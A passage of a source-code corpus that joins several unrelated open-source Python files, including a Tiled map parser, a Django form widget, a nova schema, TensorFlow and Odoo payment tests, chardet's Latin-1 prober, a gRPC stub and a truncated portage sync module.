val])) content = "" else: raise Exception('unknown data encoding %s' % \ (self.encoding)) else: # in the case of xml the encoded_content already contains a # list of integers self.decoded_content = list(map(int, self.encoded_content)) content = "" if self.compression: if self.compression == 'gzip': content = decompress_gzip(content) elif self.compression == 'zlib': content = decompress_zlib(content) else: raise Exception('unknown data compression %s' % \ (self.compression)) else: raise Exception('no encoded content to decode') struc = struct.Struct("<" + "I" * self.width) struc_unpack_from = struc.unpack_from self_decoded_content_extend = self.decoded_content.extend for idx in range(0, len(content), 4 * self.width): val = struc_unpack_from(content, idx) self_decoded_content_extend(val) arr = array.array('I') arr.fromlist(self.decoded_content) self.decoded_content = arr # TODO: generate property grid here?? self._gen_2D() def _gen_2D(self): self.content2D = [] # generate the needed lists and fill them for xpos in range(self.width): self.content2D.append(array.array('I')) for ypos in range(self.height): self.content2D[xpos].append( \ self.decoded_content[xpos + ypos * self.width]) def pretty_print(self): num = 0 for y in range(int(self.height)): output = "" for x in range(int(self.width)): output += str(self.decoded_content[num]) num += 1 print(output) def convert(self): self.opacity = float(self.opacity) self.x = int(self.x) self.y = int(self.y) self.width = int(self.width) self.height = int(self.height) self.pixel_width = self.width * self.tilewidth self.pixel_height = self.height * self.tileheight self.visible = bool(int(self.visible)) # def get_visible_tile_range(self, xmin, ymin, xmax, ymax): # tile_w = self.pixel_width / self.width # tile_h = self.pixel_height / self.height # left = int(round(float(xmin) / tile_w)) - 1 # right = int(round(float(xmax) / tile_w)) + 2 # top = int(round(float(ymin) / tile_h)) - 1 # bottom = int(round(float(ymax) / tile_h)) + 2 # return (left, top, left - right, top - bottom) # def get_tiles(self, xmin, ymin, xmax, ymax): # tiles = [] # if self.visible: # for ypos in range(ymin, ymax): # for xpos in range(xmin, xmax): # try: # img_idx = self.content2D[xpos][ypos] # if img_idx: # tiles.append((xpos, ypos, img_idx)) # except IndexError: # pass # return tiles # ----------------------------------------------------------------------------- class MapObjectGroupLayer(object): """ Group of objects on the map. :Ivariables: x : int the x position y : int the y position width : int width of the bounding box (usually 0, so no use) height : int height of the bounding box (usually 0, so no use) name : string name of the group objects : list list of the map objects """ def __init__(self): self.width = 0 self.height = 0 self.name = None self.objects = [] self.x = 0 self.y = 0 self.visible = True self.properties = {} # {name: value} self.is_object_group = True # ISSUE 9 def convert(self): self.x = int(self.x) self.y = int(self.y) self.width = int(self.width) self.height = int(self.height) for map_obj in self.objects: map_obj.x = int(map_obj.x) map_obj.y = int(map_obj.y) map_obj.width = int(map_obj.width) map_obj.height = int(map_obj.height) # ----------------------------------------------------------------------------- class MapObject(object): """ A single object on the map. :Ivariables: x : int x position relative to group x position y : int y position relative to group y position width : int width of this object height : int height of this object type : string the type of this object image_source : string source path of the image for this object image : :class:TileImage after loading this is the pygame surface containing the image """ def __init__(self): self.name = None self.x = 0 self.y = 0 self.width = 0 self.height = 0 self.type = None self.image_source = None self.image = None self.properties = {} # {name: value} # ----------------------------------------------------------------------------- def decode_base64(in_str): """ Decodes a base64 string and returns it. :Parameters: in_str : string base64 encoded string :returns: decoded string """ import base64 return base64.decodestring(in_str.encode('latin-1')) # ----------------------------------------------------------------------------- def decompress_gzip(in_str): """ Uncompresses a gzip string and returns it. :Parameters: in_str : string gzip compressed string :returns: uncompressed string """ import gzip if sys.version_info > (2, ): from io import BytesIO copmressed_stream = BytesIO(in_str) else: # gzip can only handle file object therefore using StringIO copmressed_stream = StringIO(in_str.decode("latin-1")) gzipper = gzip.GzipFile(fileobj=copmressed_stream) content = gzipper.read() gzipper.close() return content # ----------------------------------------------------------------------------- def decompress_zlib(in_str): """ Uncompresses a zlib string and returns it. :Parameters: in_str : string zlib compressed string :returns: uncompressed string """ import zlib content = zlib.decompress(in_str) return content # ----------------------------------------------------------------------------- def printer(obj, ident=''): """ Helper function, prints a hirarchy of objects. """ import inspect print((ident + obj.__class__.__name__.upper())) ident += ' ' lists = [] for name in dir(obj): elem = getattr(obj, name) if isinstance(elem, list) and name != 'decoded_content': lists.append(elem) elif not inspect.ismethod(elem): if not name.startswith('__'): if name == 'data' and elem: print((ident + 'data = ')) printer(elem, ident + ' ') else: print((ident + '%s\t= %s' % (name, getattr(obj, name)))) for objt_list in lists: for _obj in objt_list: printer(_obj, ident + ' ') # ----------------------------------------------------------------------------- class VersionError(Exception): pass # ----------------------------------------------------------------------------- class TileMapParser(object): """ Allows to parse and decode map files for 'Tiled', a open source map editor written in java. It can be found here: http://mapeditor.org/ """ def _build_tile_set(self, tile_set_node, world_map): tile_set = TileSet() self._set_attributes(tile_set_node, tile_set) if hasattr(tile_set, "source"): tile_set = self._parse_tsx(tile_set.source, tile_set, world_map) else: tile_set = self._get_tile_set(tile_set_node, tile_set, \ self.map_file_name) world_map.tile_sets.append(tile_set) def _parse_tsx(self, file_name, tile_set, world_map): # ISSUE 5: the *.tsx file is probably relative to the *.tmx file if not os.path.isabs(file_name): # print "map file name", self.map_file_name file_name = self._get_abs_path(self.map_file_name, file_name) # print "tsx filename: ", file_name # would be more elegant to use "with open(file_name, "rb") as file:" # but that is python 2.6 file = None try: file = open(file_name, "rb") dom = minidom.parseString(file.read()) finally: if file: file.close() for node in self._get_nodes(dom.childNodes, 'tileset'): tile_set = self._get_tile_set(node, tile_set, file_name) break return tile_set def _get_tile_set(self, tile_set_node, tile_set, base_path): for node in self._get_nodes(tile_set_node.childNodes, 'image'): self._build_tile_set_image(node, tile_set, base_path) for node in self._get_nodes(tile_set_node.childNodes, 'tile'): self._build_tile_set_tile(node, tile_set) self._set_attributes(tile_set_node, tile_set) return tile_set def _build_tile_set_image(self, image_node, tile_set, base_path): image = TileImage() self._set_attributes(image_node, image) # id of TileImage has to be set! -> Tile.TileImage will only have id set for node in self._get_nodes(image_node.childNodes, 'data'): self._set_attributes(node, image) image.content = node.childNodes[0].nodeValue image.source = self._get_abs_path(base_path, image.source) # ISSUE 5 tile_set.images.append(image) def _get_abs_path(self, base, relative): if os.path.isabs(relative): return relative if os.path.isfile(base): base = os.path.dirname(base) return os.path.abspath(os.path.join(base, relative)) def _build_tile_set_tile(self, tile_set_node, tile_set): tile = Tile() self._set_attributes(tile_set_node, tile) for node in self._get_nodes(tile_set_node.childNodes, 'image'): self._build_tile_set_tile_image(node, tile) tile_set.tiles.append(tile) def _build_tile_set_tile_image(self, tile_node, tile): tile_image = TileImage() self._set_attributes(tile_node, tile_image) for node in self._get_nodes(tile_node.childNodes, 'data'): self._set_attributes(node, tile_image) tile_image.content = node.childNodes[0].nodeValue tile.images.append(tile_image) def _build_layer(self, layer_node, world_map): layer = TileLayer() self._set_attributes(layer_node, layer) for node in self._get_nodes(layer_node.childNodes, 'data'): self._set_attributes(node, layer) if layer.encoding: layer.encoded_content = node.lastChild.nodeValue else: #print 'has childnodes', node.hasChildNodes() layer.encoded_content = [] for child in node.childNodes: if child.nodeType == Node.ELEMENT_NODE and \ child.nodeName == "tile": val = child.attributes["gid"].nodeValue #print child, val layer.encoded_content.append(val) world_map.layers.append(layer) def _build_world_map(self, world_node): world_map = TileMap() self._set_attributes(world_node, world_map) if world_map.version != "1.0": raise VersionError('this parser was made for maps of version 1.0, found version %s' % world_map.version) for node in self._get_nodes(world_node.childNodes, 'tileset'): self._build_tile_set(node, world_map) for node in self._get_nodes(world_node.childNodes, 'layer'): self._build_layer(node, world_map) for node in self._get_nodes(world_node.childNodes, 'objectgroup'): self._build_object_groups(node, world_map) return world_map def _build_object_groups(self, object_group_node, world_map): object_group = MapObjectGroupLayer() self._set_attributes(object_group_node, object_group) for node in self._get_nodes(object_group_node.childNodes, 'object'): tiled_object = MapObject() self._set_attributes(node, tiled_object) for img_node in self._get_nodes(node.childNodes, 'image'): tiled_object.image_source = \ img_node.attributes['source'].nodeValue object_group.objects.append(tiled_object) # ISSUE 9 world_map.layers.append(object_group) # -- helpers -- # def _get_nodes(self, nodes, name): for node in nodes: if node.nodeType == Node.ELEMENT_NODE and node.nodeName == name: yield node def _set_attributes(self, node, obj): attrs = node.attributes for attr_name in list(attrs.keys()): setattr(obj, attr_name, attrs.get(attr_name).nodeValue) self._get_properties(node, obj) def _get_properties(self, node, obj): props = {} for properties_node in self._get_nodes(node.childNodes, 'properties'): for property_node in self._get_nodes(properties_node.childNodes, 'property'): try: props[property_node.attributes['name'].nodeValue] = \ property_node.attributes['value'].nodeValue except KeyError: props[property_node.attributes['name'].nodeValue] = \ property_node.lastChild.nodeValue obj.properties.update(props) # -- parsers -- # def parse(self, file_name): """ Parses the given map. Does no decoding nor loading of the data. :return: instance of TileMap """ # would be more elegant to use # "with open(file_name, "rb") as tmx_file:" but that is python 2.6 self.map_file_name = os.path.abspath(file_name) tmx_file = None try: tmx_file = open(self.map_file_name, "rb") dom = minidom.parseString(tmx_file.read()) finally: if tmx_file: tmx_file.close() for node in self._get_nodes(dom.childNodes, 'map'): world_map = self._build_world_map(node) break world_map.map_file_name = self.map_file_name world_map.convert() return world_map def parse_decode(self, file_name): """ Parses the map but additionally decodes the data. :return: instance of TileMap """ world_map = self.parse(file_name) world_map.decode() return world_map # ----------------------------------------------------------------------------- class AbstractResourceLoader(object): """ Abstract base class for the resource loader. """ FLIP_X = 1 << 31 FLIP_Y = 1 << 30 def __init__(self): self.indexed_tiles = {} # {gid: (offsetx, offsety, image} self.world_map = None self._img_cache = {} def _load_image(self, filename, colorkey=None): # -> image """ Load a single image. :Parameters: filename : string Path to the file to be loaded. colorkey : tuple The (r, g, b) color that should be used as colorkey (or magic color). Default: None :rtype: image """ raise NotImplementedError('This should be implemented in a inherited class') def _load_image_file_like(self, file_like_obj, colorkey=None): # -> image """ Load a image from a file like object. :Parameters: file_like_obj : file This is the file like object to load the image from. colorkey : tuple The (r, g, b) color that should be used as colorkey (or magic color). Default: None :rtype: image """ raise NotImplementedError('This should be implemented in a inherited class') def _load_image_parts(self, filename, margin, spacing, tilewidth, tileheight, colorkey=None): #-> [images] """ Load different tile images from one source image. :Parameters: filename : string Path to image to be loaded. margin : int The margin around the image. spacing : int The space between the tile images. tilewidth : int The width of a single tile. tileheight : int The height of a single tile. colorkey : tuple The (r, g, b) color that should be used as colorkey (or magic color). Default: None Luckily that iteration is so easy in python:: ... w, h = image_size for y in xrange(margin, h, tileheight + spacing): for x in xrange(margin, w, tilewidth + spacing): ... :rtype: a list of images """ raise NotImplementedError('This should be implemented in a inherited class') def load(self, tile_map): """ """ self.world_map = tile_map for tile_set in tile_map.tile_sets: # do images first, because tiles could reference it for img in tile_set.images: if img.source: self._load_image_from_source(tile_map, tile_set, img) else: tile_set.indexed_images[img.id] = self._load_tile_image(img) # tiles for tile in tile_set.tiles: for img in tile.images: if not img.content and not img.source: # only image id set indexed_img = tile_set.indexed_images[img.id] self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img) else: if img.source: self._load_image_from_source(tile_map, tile_set, img) else: indexed_img = self._load_tile_image(img) self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img) def _load_image_from_source(self, tile_map, tile_set, a_tile_image): # relative path to file img_path = os.path.join(os.path.dirname(tile_map.map_file_name), \ a_tile_image.source) tile_width = int(tile_map.tilewidth) tile_height = int(tile_map.tileheight) if tile_set.tileheight: tile_width = int(tile_set.tilewidth) if tile_set.tilewidth: tile_height = int(tile_set.tileheight) offsetx = 0 offsety = 0 # the offset is used for pygame because the origin is topleft in pygame if tile_height > tile_map.tileheight: offsety = tile_height - tile_map.tileheight idx = 0 for image in self._load_image_parts(img_path, \ tile_set.margin, tile_set.spacing, \ tile_width, tile_height, a_tile_image.trans): self.indexed_tiles[int(tile_set.firstgid) + idx] = \ (offsetx, -offsety, image) idx += 1 def _load_tile_image(self, a_tile_image): img_str = a_tile_image.content if a_tile_image.encoding: if a_tile_image.encoding == 'base64': img_str = decode_base64(a_tile_image.content) else: raise Exception('unknown image encoding %s' % a_tile_image.encoding) sio = StringIO(img_str) new_image = self._load_image_file_like(sio, a_tile_image.trans) return new_image # -----------------------------------------------------------------------------
weidongxu84/info-gatherer
refs/heads/master
django/contrib/localflavor/co/forms.py
196
""" Colombian-specific form helpers. """ from __future__ import absolute_import from django.contrib.localflavor.co.co_departments import DEPARTMENT_CHOICES from django.forms.fields import Select class CODepartmentSelect(Select): """ A Select widget that uses a list of Colombian states as its choices. """ def __init__(self, attrs=None): super(CODepartmentSelect, self).__init__(attrs, choices=DEPARTMENT_CHOICES)
mgagne/nova
refs/heads/master
nova/api/openstack/compute/schemas/v3/create_backup.py
59
# Copyright 2014 NEC Corporation. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.validation import parameter_types create_backup = { 'type': 'object', 'properties': { 'createBackup': { 'type': 'object', 'properties': { 'name': parameter_types.name, 'backup_type': { 'type': 'string', }, 'rotation': parameter_types.non_negative_integer, 'metadata': { 'type': 'object', } }, 'required': ['name', 'backup_type', 'rotation'], 'additionalProperties': False, }, }, 'required': ['createBackup'], 'additionalProperties': False, }
DailyActie/Surrogate-Model
refs/heads/master
01-codes/tensorflow-master/tensorflow/python/kernel_tests/division_past_test.py
1
# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for division with division imported from __future__. This file should be exactly the same as division_past_test.py except for the __future__ division line. """ from __future__ import absolute_import # from __future__ import division # Intentionally skip this import from __future__ import print_function import numpy as np import tensorflow as tf class DivisionTestCase(tf.test.TestCase): def testDivision(self): """Test all the different ways to divide.""" values = [1, 2, 7, 11] functions = (lambda x: x), tf.constant # TODO(irving): Test int8, int16 once we support casts for those. dtypes = np.int32, np.int64, np.float32, np.float64 def check(x, y): if isinstance(x, tf.Tensor): x = x.eval() if isinstance(y, tf.Tensor): y = y.eval() self.assertEqual(x.dtype, y.dtype) self.assertEqual(x, y) with self.test_session(): for dtype in dtypes: for x in map(dtype, values): for y in map(dtype, values): for fx in functions: for fy in functions: tf_x = fx(x) tf_y = fy(y) div = x / y tf_div = tf_x / tf_y check(div, tf_div) floordiv = x // y tf_floordiv = tf_x // tf_y check(floordiv, tf_floordiv) if __name__ == "__main__": tf.test.main()
Adamssss/projectEuler
refs/heads/master
Problem 001-150 Python/pb058.py
1
import math import time t1 = time.time() prime = [] def primeSieve(n): global prime n = (n+1)//2 p = [True]*(n) i = 1 prime.append(2) while i < n: if p[i]: t = 2*i+1 prime.append(t) p[i] = False j = 2*i*i+2*i while j < n: p[j] = False j += t i += 1 return prime primeSieve(10000) def genPrime(): global prime b = prime[-1] while True: b = b+2 i = 0 t = True while (prime[i]*prime[i] < b): i=i+1 if (b%prime[i] == 0): t = False break if t: prime.append(b) break return b def isPrime(item): root = math.floor(math.sqrt(item)) i = 0 t = prime[i] while t <= root: if item%t == 0: return False if t < prime[-1]: i += 1 t = prime[i] else: t += genPrime() return True # diagonal prime ratio dpr = [] # first term: 1 is not a prime dpr.append([0,1]) # generate the new diagonals # put them into dpr def gen(n): s = 2*n+1 br = s*s bl = br-s+1 tl = bl-s+1 tr = tl-s+1 global dpr tempdpr = dpr[n-1][:] tempdpr[1] += 4 if isPrime(bl): tempdpr[0] += 1 if isPrime(tl): tempdpr[0] += 1 if isPrime(tr): tempdpr[0] += 1 dpr.append(tempdpr) def fallBelow(term): if term[0]/term[1] < 0.1: return True return False gen(1) i = 1 while not fallBelow(dpr[i]): i += 1 gen(i) print (i*2+1) print("time:",time.time()-t1)
aviciimaxwell/odoo
refs/heads/8.0
addons/payment_buckaroo/tests/test_buckaroo.py
321
# -*- coding: utf-8 -*- from lxml import objectify import urlparse import openerp from openerp.addons.payment.models.payment_acquirer import ValidationError from openerp.addons.payment.tests.common import PaymentAcquirerCommon from openerp.addons.payment_buckaroo.controllers.main import BuckarooController from openerp.tools import mute_logger @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooCommon(PaymentAcquirerCommon): def setUp(self): super(BuckarooCommon, self).setUp() cr, uid = self.cr, self.uid self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url') # get the buckaroo account model, self.buckaroo_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_buckaroo', 'payment_acquirer_buckaroo') @openerp.tests.common.at_install(False) @openerp.tests.common.post_install(False) class BuckarooForm(BuckarooCommon): def test_10_Buckaroo_form_render(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid things buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # ---------------------------------------- # Test: button direct rendering # ---------------------------------------- form_values = { 'add_returndata': None, 'Brq_websitekey': buckaroo.brq_websitekey, 'Brq_amount': '2240.0', 'Brq_currency': 'EUR', 'Brq_invoicenumber': 'SO004', 'Brq_signature': '1b8c10074c622d965272a91a9e88b5b3777d2474', # update me 'brq_test': 'True', 'Brq_return': '%s' % urlparse.urljoin(self.base_url, BuckarooController._return_url), 'Brq_returncancel': '%s' % urlparse.urljoin(self.base_url, BuckarooController._cancel_url), 'Brq_returnerror': '%s' % urlparse.urljoin(self.base_url, BuckarooController._exception_url), 'Brq_returnreject': '%s' % urlparse.urljoin(self.base_url, BuckarooController._reject_url), 'Brq_culture': 'en-US', } # render the button res = self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'SO004', 2240.0, self.currency_euro_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) # ---------------------------------------- # Test2: button using tx + validation # ---------------------------------------- # create a new draft tx tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_id': self.buyer_id, }, context=context ) # render the button res = self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'should_be_erased', 2240.0, self.currency_euro, tx_id=tx_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) @mute_logger('openerp.addons.payment_buckaroo.models.buckaroo', 'ValidationError') def test_20_buckaroo_form_management(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid thing buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # typical data posted by buckaroo after client has successfully paid buckaroo_post_data = { 'BRQ_RETURNDATA': u'', 'BRQ_AMOUNT': u'2240.00', 'BRQ_CURRENCY': u'EUR', 'BRQ_CUSTOMER_NAME': u'Jan de Tester', 'BRQ_INVOICENUMBER': u'SO004', 'BRQ_PAYMENT': u'573311D081B04069BD6336001611DBD4', 'BRQ_PAYMENT_METHOD': u'paypal', 'BRQ_SERVICE_PAYPAL_PAYERCOUNTRY': u'NL', 'BRQ_SERVICE_PAYPAL_PAYEREMAIL': u'fhe@openerp.com', 'BRQ_SERVICE_PAYPAL_PAYERFIRSTNAME': u'Jan', 'BRQ_SERVICE_PAYPAL_PAYERLASTNAME': u'Tester', 'BRQ_SERVICE_PAYPAL_PAYERMIDDLENAME': u'de', 'BRQ_SERVICE_PAYPAL_PAYERSTATUS': u'verified', 'BRQ_SIGNATURE': u'175d82dd53a02bad393fee32cb1eafa3b6fbbd91', 'BRQ_STATUSCODE': u'190', 'BRQ_STATUSCODE_DETAIL': u'S001', 'BRQ_STATUSMESSAGE': u'Transaction successfully processed', 'BRQ_TEST': u'true', 'BRQ_TIMESTAMP': u'2014-05-08 12:41:21', 'BRQ_TRANSACTIONS': u'D6106678E1D54EEB8093F5B3AC42EA7B', 'BRQ_WEBSITEKEY': u'5xTGyGyPyl', } # should raise error about unknown tx with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_name': 'Norbert Buyer', 'partner_country_id': self.country_france_id, }, context=context ) # validate it self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'done', 'Buckaroo: validation did not put tx into done state') self.assertEqual(tx.buckaroo_txnid, buckaroo_post_data.get('BRQ_TRANSACTIONS'), 'Buckaroo: validation did not update tx payid') # reset tx tx.write({'state': 'draft', 'date_validate': False, 'buckaroo_txnid': False}) # now buckaroo post is ok: try to modify the SHASIGN buckaroo_post_data['BRQ_SIGNATURE'] = '54d928810e343acf5fb0c3ee75fd747ff159ef7a' with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # simulate an error buckaroo_post_data['BRQ_STATUSCODE'] = 2 buckaroo_post_data['BRQ_SIGNATURE'] = '4164b52adb1e6a2221d3d8a39d8c3e18a9ecb90b' self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'error', 'Buckaroo: erroneous validation did not put tx into error state')
fvcproductions/dotfiles
refs/heads/master
bin/sketch/Plugins/WakaTime.sketchplugin/Contents/Resources/wakatime/packages/requests/packages/chardet/latin1prober.py
1777
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Universal charset detector code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 2001 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # Shy Shalom - original C code # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### from .charsetprober import CharSetProber from .constants import eNotMe from .compat import wrap_ord FREQ_CAT_NUM = 4 UDF = 0 # undefined OTH = 1 # other ASC = 2 # ascii capital letter ASS = 3 # ascii small letter ACV = 4 # accent capital vowel ACO = 5 # accent capital other ASV = 6 # accent small vowel ASO = 7 # accent small other CLASS_NUM = 8 # total classes Latin1_CharToClass = ( OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07 OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17 OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27 OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37 OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47 ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57 ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67 ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77 ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87 OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97 OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7 OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7 OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7 ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7 ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7 ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7 ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF ) # 0 : illegal # 1 : very unlikely # 2 : normal # 3 : very likely Latin1ClassModel = ( # UDF OTH ASC ASS ACV ACO ASV ASO 0, 0, 0, 0, 0, 0, 0, 0, # UDF 0, 3, 3, 3, 3, 3, 3, 3, # OTH 0, 3, 3, 3, 3, 3, 3, 3, # ASC 0, 3, 3, 3, 1, 1, 3, 3, # ASS 0, 3, 3, 3, 1, 2, 1, 2, # ACV 0, 3, 3, 3, 3, 3, 3, 3, # ACO 0, 3, 1, 3, 1, 1, 1, 3, # ASV 0, 3, 1, 3, 1, 1, 3, 3, # ASO ) class Latin1Prober(CharSetProber): def __init__(self): CharSetProber.__init__(self) self.reset() def reset(self): self._mLastCharClass = OTH self._mFreqCounter = [0] * FREQ_CAT_NUM CharSetProber.reset(self) def get_charset_name(self): return "windows-1252" def feed(self, aBuf): aBuf = self.filter_with_english_letters(aBuf) for c in aBuf: charClass = Latin1_CharToClass[wrap_ord(c)] freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + charClass] if freq == 0: self._mState = eNotMe break self._mFreqCounter[freq] += 1 self._mLastCharClass = charClass return self.get_state() def get_confidence(self): if self.get_state() == eNotMe: return 0.01 total = sum(self._mFreqCounter) if total < 0.01: confidence = 0.0 else: confidence = ((self._mFreqCounter[3] - self._mFreqCounter[1] * 20.0) / total) if confidence < 0.0: confidence = 0.0 # lower the confidence of latin1 so that other more accurate # detector can take priority. confidence = confidence * 0.73 return confidence
ItsLastDay/academic_university_2016-2018
refs/heads/master
subjects/SoftwareDesign/au-software_design-2017/chat/src/chat_pb2_grpc.py
1
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc import chat_pb2 as chat__pb2 class ChatStub(object): def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.ChatSession = channel.stream_stream( '/Chat/ChatSession', request_serializer=chat__pb2.ChatMsg.SerializeToString, response_deserializer=chat__pb2.ChatMsg.FromString, ) class ChatServicer(object): def ChatSession(self, request_iterator, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_ChatServicer_to_server(servicer, server): rpc_method_handlers = { 'ChatSession': grpc.stream_stream_rpc_method_handler( servicer.ChatSession, request_deserializer=chat__pb2.ChatMsg.FromString, response_serializer=chat__pb2.ChatMsg.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'Chat', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,))
gmt/portage
refs/heads/master
pym/portage/sync/__init__.py
5
# Copyright 2014-2015 Gentoo Foundation # Distributed under the terms of the GNU General Public License v2 import os from portage import OrderedDict from portage.module import Modules from portage.sync.controller import SyncManager from portage.sync.config_checks import check_type _SUBMODULE_PATH_MAP = OrderedDict([ ('glsa', ('metadata/glsa',)), ('news', ('metadata/news',)), ('profiles', ('metadata/layout.conf', 'profiles')), ]) path = os.path.join(os.path.dirname(__file__), "modules") # initial development debug info #print("module path:", path) module_controller = Modules(path=path, namepath="portage.sync.modules") # initial development debug info #print(module_controller.module_names) module_names = module_controller.module_names[:] def module_specific_options(repo): '''Get the authorized module specific options set for the repos.conf settings for the repo''' global module_controller if repo.sync_type: try: return frozenset( module_controller.modules[repo.sync_type]['module_specific_options']) except KeyError: pass return frozenset() def validate_config(repo, logger): '''Validate the repos.conf settings for the repo''' global module_names, module_controller if not check_type(repo, logger, module_names): return False #print(repo) if repo.sync_type: validated = 